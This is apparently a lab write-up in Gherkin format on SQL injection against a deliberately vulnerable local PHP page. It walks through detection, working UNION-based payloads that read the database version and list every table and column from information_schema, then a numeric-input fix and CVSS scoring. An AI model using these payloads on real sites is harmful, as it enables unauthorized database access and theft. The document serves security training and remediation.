## Version 1.4.1
## language: en

Feature: SQL Injection Level 2
  TOE:
    Vulnerable Web Application
  Category:
    SQL Injection
  Location:
    http://localhost/www/SQL/sql2.php
  CWE:
    CWE-89: Improper Neutralization of Special Elements used in
    an SQL Command ('SQL Injection')
  Rule:
    REQ.173: https://fluidattacks.com/web/rules/173/
  Goal:
    Create an SQL injection to get database information
  Recommendation:
    Use prepared sql statements and sanitize inputs

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Kali linux      | 4.19.0      |
    | Firefox         | 60.6.2      |
  TOE information:
    Given The site "http://localhost/www/SQL/sql2.php"
    When I enter into the site
    Then The server is running 10.1.13-MariaDB


  Scenario: Normal use case
    Given A search bar
    When I enter the book's number
    Then I get the the books's name and the author [evidence](image1.png)

  Scenario: Static detection
    Given The source code
    When I search for the sql query inside the code
    """
    $query = "SELECT bookname,authorname FROM books WHERE number = $number";
    """
    Then I can understand the syntax
    When The web server receives the book's number
    Then It is concatenated inside the query
    When I inject sql statements inside the parameter
    Then It is executed
    And It is SQL injection vulnerability

  Scenario: Dynamic detection
    Given The search bar
    When I put a single quote inside the search bar
    Then The page returns an error and the query
    When I read the error
    """
    Invalid query: Whole query: SELECT bookname,authorname FROM books
    WHERE number = '
    """
    Then I see that my quote is at the end of the query
    And I have an sql injection vulnerability


  Scenario: Exploitation
    Given The vulnerability
    When I get the error message using the single quote
    """
    Invalid query: Whole query: SELECT bookname,authorname FROM books
    WHERE number = '
    """
    Then I see that i need to columns in order to have a correct query
    When I try other injection
    """
    ' union select 1,2#
    """
    Then I get the error message
    """
    Invalid query: Whole query: SELECT bookname,authorname
    FROM books WHERE number = ' union select 1,2#
    """
    When I see that my query needs another single quote
    Then I try another sql injection
    """
    '' union select 1, version()#
    """
    And I get the output of my query [evidence](image2.png)
    When I have a succesfull sql injection
    Then I try to fetch all the tables and their columns
    """
    '' union SELECT table_name,column_name FROM information_schema.columns#
    """
    And I have some value information of the database

  Scenario: Remediation
    Given The source code
    When I add the next lines of code
    """
    if(!is_numeric($number)){
    echo "Please only numeric values";
    exit(0);
    }
    """
    Then I try an sql injection
    """
    '' union SELECT table_name,column_name FROM information_schema.columns#
    """
    And The vulnerability is patched [evidence](image3.png)

  Scenario: Scoring
    Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      9.8/10 (Critical) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    Temporal: Attributes that measure the exploit's popularity and fixability
      9.1/10 (Critical) - E:H/RL:T/RC:R/CR:H/IR:H/AR:H
    Environmental: Unique and relevant attributes to a specific user environment
      9.1/10 (Critical) - MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:H/MI:H/MA:H

  Scenario: Correlations
    No correlations have been found to this date 2019-09-09
